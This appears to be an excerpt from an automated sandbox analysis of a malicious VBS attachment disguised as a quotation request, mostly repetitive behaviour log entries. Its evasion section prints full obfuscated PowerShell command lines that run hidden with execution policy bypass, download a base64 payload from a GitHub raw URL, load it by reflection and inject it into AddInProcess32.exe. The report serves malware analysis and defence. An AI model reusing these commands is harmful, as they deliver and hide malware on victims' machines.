Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1537 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2023 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3324 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6491 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe API coverage: 2.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6088 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160 Thread sleep count: 3324 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160 Thread sleep count: 6491 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2732 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000003.2275395729.0000017BD8182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2274993999.0000017BD8179000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2275226728.0000017BD8182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2277688287.0000017BD6296000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2274110551.0000017BD8161000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2277401194.0000017BD8182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2274511242.0000017BD8177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iZpHNiRsoeGiBaKQemuKuqKGPiWhfWUUdmiibOxWLmxxebrWUddcqGiZxiNjKWpnBWPG
Source: wscript.exe, 00000000.00000003.2277701458.0000017BD83B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\+
Source: powershell.exe, 00000004.00000002.2442426317.0000022C199CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWeP
Source: wscript.exe, 00000000.00000003.2275395729.0000017BD8182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2274993999.0000017BD8179000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2275226728.0000017BD8182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2277511112.0000017BD629F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2274110551.0000017BD8161000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2277401194.0000017BD8182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2274511242.0000017BD8177000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2277781737.0000017BD8301000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2277911140.0000017BD8401000.00000004.00000020.00020000.00000000.sdmp, RFQ-5120240930 VENETA PESCA SRL.vbs Binary or memory string: WzPWlHAWfHzsBiiNWJLeqogNiWhCRlGLCldIOidkWLGxcekeAIaaILWCBOhihGOluWdd = "iZpHNiRsoeGiBaKQemuKuqKGPiWhfWUUdmiibOxWLmxxebrWUddcqGiZxiNjKWpnBWPG"
Source: wscript.exe, 00000000.00000003.2274975625.0000017BD8004000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DiZpHNiRsoeGiBaKQemuKuqKGPiWhfWUUdmiibOxWLmxxebrWUddcqGiZxiNjKWpnBWPGciSpix
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi64_4256.amsi.csv, type: OTHER
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSE9NRVsyMV0rJHBTSE9NZVszNF0rJ3gnKSgoKCdDJysnaVN1cmwgPScrJyBmJysnbVVodHRwczovJysnL3JhdycrJy5nJysnaXQnKydodWJ1JysncycrJ2VyJysnYycrJ28nKydudGVudCcrJy5jb20vTm8nKydEZXRlJysnY3RPbicrJy8nKydObycrJ0RlJysndGVjdE8nKyduL3JlZicrJ3MvJysnaGVhZHMnKycvJysnbWFpJysnbi9EJysnZXQnKydhaCcrJ05vdGgtVi50JysneHQnKydmbVU7IENpU2Jhc2U2NENvJysnbnRlJysnbnQgPSAoTmV3LU8nKydiJysnamVjdCcrJyBTeXN0ZW0uTicrJ2V0LldlYkMnKydsaScrJ2VudCkuJysnRG93bmxvYScrJ2RTJysndHInKydpbmcnKycoQ2knKydTdXInKydsKTsgQycrJ2lTYicrJ2knKyduYScrJ3J5JysnQ28nKydudCcrJ2VudCA9JysnICcrJ1tTeXN0ZScrJ20uQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpJysnbmcoJysnQycrJ2lTYmFzZTY0Q29uJysndGVudCk7JysnIEMnKydpUycrJ2Fzc2VtYicrJ2x5ID0nKycgJysnW1InKydlZmxlY3RpbycrJ24uQXMnKydzZW0nKydibHknKyddOjpMbycrJ2FkKCcrJ0MnKydpU2JpJysnbicrJ2FyeScrJ0MnKydvbnRlbicrJ3QnKycpJysnOyBbZG5saWIuSU8nKycuSG9tZV06OlZBSSgnKydhJysnM1UwL2RpeUtGL2QvZWUuJysnZXQnKydzJysnYXAnKycvLzpzcCcrJ3R0aGEzVSwgYTMnKydVZGVzJysnYScrJ3RpJysndicrJ2EnKydkb2EzVScrJywnKycgYScrJzNVZGUnKydzJysnYXRpdmEnKydkbycrJ2EzJysnVSwgYTNVZGUnKydzYXQnKydpJysndmFkb2EzVSwgYTNVQScrJ2RkJysnSW5QJysncm9jZScrJ3NzMzInKydhM1UsIGEzVWEnKyczVSxhM1VhJysnM1UpJykgLVJFcGxBY2UgIChbQ2hBcl05NytbQ2hBcl01MStbQ2hBcl04NSksW0NoQXJdMzQgLWNyZVBMYUNFICAnZm1VJyxbQ2hBcl0zOSAgLVJFcGxBY2UgIChbQ2hBcl02NytbQ2hBcl0xMDUrW0NoQXJdODMpLFtDaEFyXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 42C000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 42E000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 42F000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 910008 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSE9NRVsyMV0rJHBTSE9NZVszNF0rJ3gnKSgoKCdDJysnaVN1cmwgPScrJyBmJysnbVVodHRwczovJysnL3JhdycrJy5nJysnaXQnKydodWJ1JysncycrJ2VyJysnYycrJ28nKydudGVudCcrJy5jb20vTm8nKydEZXRlJysnY3RPbicrJy8nKydObycrJ0RlJysndGVjdE8nKyduL3JlZicrJ3MvJysnaGVhZHMnKycvJysnbWFpJysnbi9EJysnZXQnKydhaCcrJ05vdGgtVi50JysneHQnKydmbVU7IENpU2Jhc2U2NENvJysnbnRlJysnbnQgPSAoTmV3LU8nKydiJysnamVjdCcrJyBTeXN0ZW0uTicrJ2V0LldlYkMnKydsaScrJ2VudCkuJysnRG93bmxvYScrJ2RTJysndHInKydpbmcnKycoQ2knKydTdXInKydsKTsgQycrJ2lTYicrJ2knKyduYScrJ3J5JysnQ28nKydudCcrJ2VudCA9JysnICcrJ1tTeXN0ZScrJ20uQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpJysnbmcoJysnQycrJ2lTYmFzZTY0Q29uJysndGVudCk7JysnIEMnKydpUycrJ2Fzc2VtYicrJ2x5ID0nKycgJysnW1InKydlZmxlY3RpbycrJ24uQXMnKydzZW0nKydibHknKyddOjpMbycrJ2FkKCcrJ0MnKydpU2JpJysnbicrJ2FyeScrJ0MnKydvbnRlbicrJ3QnKycpJysnOyBbZG5saWIuSU8nKycuSG9tZV06OlZBSSgnKydhJysnM1UwL2RpeUtGL2QvZWUuJysnZXQnKydzJysnYXAnKycvLzpzcCcrJ3R0aGEzVSwgYTMnKydVZGVzJysnYScrJ3RpJysndicrJ2EnKydkb2EzVScrJywnKycgYScrJzNVZGUnKydzJysnYXRpdmEnKydkbycrJ2EzJysnVSwgYTNVZGUnKydzYXQnKydpJysndmFkb2EzVSwgYTNVQScrJ2RkJysnSW5QJysncm9jZScrJ3NzMzInKydhM1UsIGEzVWEnKyczVSxhM1VhJysnM1UpJykgLVJFcGxBY2UgIChbQ2hBcl05NytbQ2hBcl01MStbQ2hBcl04NSksW0NoQXJdMzQgLWNyZVBMYUNFICAnZm1VJyxbQ2hBcl0zOSAgLVJFcGxBY2UgIChbQ2hBcl02NytbQ2hBcl0xMDUrW0NoQXJdODMpLFtDaEFyXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHOME[21]+$pSHOMe[34]+'x')((('C'+'iSurl ='+' f'+'mUhttps:/'+'/raw'+'.g'+'it'+'hubu'+'s'+'er'+'c'+'o'+'ntent'+'.com/No'+'Dete'+'ctOn'+'/'+'No'+'De'+'tectO'+'n/ref'+'s/'+'heads'+'/'+'mai'+'n/D'+'et'+'ah'+'Noth-V.t'+'xt'+'fmU; CiSbase64Co'+'nte'+'nt = (New-O'+'b'+'ject'+' System.N'+'et.WebC'+'li'+'ent).'+'Downloa'+'dS'+'tr'+'ing'+'(Ci'+'Sur'+'l); C'+'iSb'+'i'+'na'+'ry'+'Co'+'nt'+'ent ='+' '+'[Syste'+'m.Con'+'vert'+']::FromBase64S'+'t'+'ri'+'ng('+'C'+'iSbase64Con'+'tent);'+' C'+'iS'+'assemb'+'ly ='+' '+'[R'+'eflectio'+'n.As'+'sem'+'bly'+']::Lo'+'ad('+'C'+'iSbi'+'n'+'ary'+'C'+'onten'+'t'+')'+'; [dnlib.IO'+'.Home]::VAI('+'a'+'3U0/diyKF/d/ee.'+'et'+'s'+'ap'+'//:sp'+'ttha3U, a3'+'Udes'+'a'+'ti'+'v'+'a'+'doa3U'+','+' a'+'3Ude'+'s'+'ativa'+'do'+'a3'+'U, a3Ude'+'sat'+'i'+'vadoa3U, a3UA'+'dd'+'InP'+'roce'+'ss32'+'a3U, a3Ua'+'3U,a3Ua'+'3U)') -REplAce ([ChAr]97+[ChAr]51+[ChAr]85),[ChAr]34 -crePLaCE 'fmU',[ChAr]39 -REplAce ([ChAr]67+[ChAr]105+[ChAr]83),[ChAr]36) )" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbzse9nrvsymv0rjhbtse9nzvsznf0rj3gnksgokcddjysnavn1cmwgpscrjybmjysnbvvodhrwczovjysnl3jhdycrjy5njysnaxqnkydodwj1jysncycrj2vyjysnyycrj28nkydudgvudccrjy5jb20vtm8nkydezxrljysny3rpbicrjy8nkydobycrj0rljysndgvjde8nkydul3jlzicrj3mvjysnagvhzhmnkycvjysnbwfpjysnbi9ejysnzxqnkydhaccrj05vdggtvi50jysnehqnkydmbvu7ienpu2jhc2u2nenvjysnbnrljysnbnqgpsaotmv3lu8nkydijysnamvjdccrjybtexn0zw0uticrj2v0lldlykmnkydsascrj2vudckujysnrg93bmxvyscrj2rtjysndhinkydpbmcnkycoq2knkydtdxinkydsktsgqycrj2ltyicrj2knkyduyscrj3j5jysnq28nkydudccrj2vudca9jysniccrj1ttexn0zscrj20uq29ujysndmvydccrj106okzyb21cyxnlnjrtjysndccrj3jpjysnbmcojysnqycrj2ltymfzzty0q29ujysndgvudck7jysniemnkydpuycrj2fzc2vtyicrj2x5id0nkycgjysnw1inkydlzmxly3rpbycrj24uqxmnkydzzw0nkydibhknkyddojpmbycrj2fkkccrj0mnkydpu2jpjysnbicrj2fyescrj0mnkydvbnrlbicrj3qnkycpjysnoybbzg5sawiusu8nkycusg9tzv06olzbssgnkydhjysnm1uwl2rpeutgl2qvzwuujysnzxqnkydzjysnyxankycvlzpzcccrj3r0agezvswgytmnkydvzgvzjysnyscrj3rpjysndicrj2enkydkb2ezvscrjywnkycgyscrjznvzgunkydzjysnyxrpdmenkydkbycrj2ezjysnvswgytnvzgunkydzyxqnkydpjysndmfkb2ezvswgytnvqscrj2rkjysnsw5qjysncm9jzscrj3nzmzinkydhm1usigezvwenkyczvsxhm1vhjysnm1upjykglvjfcgxby2ugichbq2hbcl05nytbq2hbcl01mstbq2hbcl04nsksw0noqxjdmzqglwnyzvbmyunficanzm1vjyxbq2hbcl0zosaglvjfcgxby2ugichbq2hbcl02nytbq2hbcl0xmdurw0noqxjdodmplftdaefyxtm2ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[21]+$pshome[34]+'x')((('c'+'isurl ='+' f'+'muhttps:/'+'/raw'+'.g'+'it'+'hubu'+'s'+'er'+'c'+'o'+'ntent'+'.com/no'+'dete'+'cton'+'/'+'no'+'de'+'tecto'+'n/ref'+'s/'+'heads'+'/'+'mai'+'n/d'+'et'+'ah'+'noth-v.t'+'xt'+'fmu; cisbase64co'+'nte'+'nt = (new-o'+'b'+'ject'+' system.n'+'et.webc'+'li'+'ent).'+'downloa'+'ds'+'tr'+'ing'+'(ci'+'sur'+'l); c'+'isb'+'i'+'na'+'ry'+'co'+'nt'+'ent ='+' '+'[syste'+'m.con'+'vert'+']::frombase64s'+'t'+'ri'+'ng('+'c'+'isbase64con'+'tent);'+' c'+'is'+'assemb'+'ly ='+' '+'[r'+'eflectio'+'n.as'+'sem'+'bly'+']::lo'+'ad('+'c'+'isbi'+'n'+'ary'+'c'+'onten'+'t'+')'+'; [dnlib.io'+'.home]::vai('+'a'+'3u0/diykf/d/ee.'+'et'+'s'+'ap'+'//:sp'+'ttha3u, a3'+'udes'+'a'+'ti'+'v'+'a'+'doa3u'+','+' a'+'3ude'+'s'+'ativa'+'do'+'a3'+'u, a3ude'+'sat'+'i'+'vadoa3u, a3ua'+'dd'+'inp'+'roce'+'ss32'+'a3u, a3ua'+'3u,a3ua'+'3u)') -replace ([char]97+[char]51+[char]85),[char]34 -creplace 'fmu',[char]39 -replace ([char]67+[char]105+[char]83),[char]36) )"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbzse9nrvsymv0rjhbtse9nzvsznf0rj3gnksgokcddjysnavn1cmwgpscrjybmjysnbvvodhrwczovjysnl3jhdycrjy5njysnaxqnkydodwj1jysncycrj2vyjysnyycrj28nkydudgvudccrjy5jb20vtm8nkydezxrljysny3rpbicrjy8nkydobycrj0rljysndgvjde8nkydul3jlzicrj3mvjysnagvhzhmnkycvjysnbwfpjysnbi9ejysnzxqnkydhaccrj05vdggtvi50jysnehqnkydmbvu7ienpu2jhc2u2nenvjysnbnrljysnbnqgpsaotmv3lu8nkydijysnamvjdccrjybtexn0zw0uticrj2v0lldlykmnkydsascrj2vudckujysnrg93bmxvyscrj2rtjysndhinkydpbmcnkycoq2knkydtdxinkydsktsgqycrj2ltyicrj2knkyduyscrj3j5jysnq28nkydudccrj2vudca9jysniccrj1ttexn0zscrj20uq29ujysndmvydccrj106okzyb21cyxnlnjrtjysndccrj3jpjysnbmcojysnqycrj2ltymfzzty0q29ujysndgvudck7jysniemnkydpuycrj2fzc2vtyicrj2x5id0nkycgjysnw1inkydlzmxly3rpbycrj24uqxmnkydzzw0nkydibhknkyddojpmbycrj2fkkccrj0mnkydpu2jpjysnbicrj2fyescrj0mnkydvbnrlbicrj3qnkycpjysnoybbzg5sawiusu8nkycusg9tzv06olzbssgnkydhjysnm1uwl2rpeutgl2qvzwuujysnzxqnkydzjysnyxankycvlzpzcccrj3r0agezvswgytmnkydvzgvzjysnyscrj3rpjysndicrj2enkydkb2ezvscrjywnkycgyscrjznvzgunkydzjysnyxrpdmenkydkbycrj2ezjysnvswgytnvzgunkydzyxqnkydpjysndmfkb2ezvswgytnvqscrj2rkjysnsw5qjysncm9jzscrj3nzmzinkydhm1usigezvwenkyczvsxhm1vhjysnm1upjykglvjfcgxby2ugichbq2hbcl05nytbq2hbcl01mstbq2hbcl04nsksw0noqxjdmzqglwnyzvbmyunficanzm1vjyxbq2hbcl0zosaglvjfcgxby2ugichbq2hbcl02nytbq2hbcl0xmdurw0noqxjdodmplftdaefyxtm2ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[21]+$pshome[34]+'x')((('c'+'isurl ='+' f'+'muhttps:/'+'/raw'+'.g'+'it'+'hubu'+'s'+'er'+'c'+'o'+'ntent'+'.com/no'+'dete'+'cton'+'/'+'no'+'de'+'tecto'+'n/ref'+'s/'+'heads'+'/'+'mai'+'n/d'+'et'+'ah'+'noth-v.t'+'xt'+'fmu; cisbase64co'+'nte'+'nt = (new-o'+'b'+'ject'+' system.n'+'et.webc'+'li'+'ent).'+'downloa'+'ds'+'tr'+'ing'+'(ci'+'sur'+'l); c'+'isb'+'i'+'na'+'ry'+'co'+'nt'+'ent ='+' '+'[syste'+'m.con'+'vert'+']::frombase64s'+'t'+'ri'+'ng('+'c'+'isbase64con'+'tent);'+' c'+'is'+'assemb'+'ly ='+' 